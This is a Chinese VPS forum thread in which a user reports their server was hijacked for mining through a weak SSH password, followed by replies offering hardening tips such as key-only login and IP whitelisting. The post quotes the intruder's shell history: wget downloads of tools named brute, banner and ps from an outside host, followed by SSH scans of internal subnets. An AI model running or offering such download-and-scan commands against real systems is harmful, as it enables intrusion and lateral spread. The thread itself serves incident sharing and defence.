论坛主页 › VPS专版 › 一不小心被挖矿了

codger 发表于 2023-12-24 10:05:21

一不小心被挖矿了

防范意识薄弱，小鸡用的弱密码，没禁用密码登陆，今天登上机器看cpu100%，
马上意识到被挖矿了。看了下历史记录

sudo -i133exit134nproc135lscpu136exit137nproc138exit139nproc140ls141ip r142exit143wget david1337.dev/brute144wget david1337.dev/banner145wget david1337.dev/ps146chmod +x *147ip r148./ps 10.42 22149./ps 192.168 22150./ps 172.17 22151ls152exit153lscpu154ls155exit156top157exit158clear159ls

淦塔皮燕纸 david1337.dev

rewiner 发表于 2023-12-24 10:06:09

拿到鸡第一步。修改密码，3种混合。修改22端口。开启bbr

julf 发表于 2023-12-24 10:06:22

不放心还是重装了

灌水王 发表于 2023-12-24 10:06:53

第一步不就是禁密码登录改成密钥么，
密钥还更方便:lol

aa414350471 发表于 2023-12-24 10:07:30

端口只对白名单ip开放，稳得一比，你密码设置123都没问题:lol

灌水王 发表于 2023-12-24 10:08:09

这个矿工不专业，鞋套都不戴，差评

灌水王 发表于 2023-12-24 10:09:07

密钥，其他都是默认，dmit什么的开机就是密钥，更规范

xkcash 发表于 2023-12-24 10:09:51

https://hostloc.com/thread-957070-1-1.html




* Linux常用命令：rar a file1.rar file1 file2 dir1 同时压缩 'file1', 'file2' 以及目录 'dir1'



* 资源 https://t.me/MJJ_aliyundrive
* MJJ频道 https://t.me/wearemjj
* Linux命令大全 https://www.linuxcool.com
* HostLoc频道 https://t.me/myhostloc
   

灌水王 发表于 2023-12-24 10:10:00

三个脚本被删除了。楼主有备份吗 发出来学习下

查看完整版本: 一不小心被挖矿了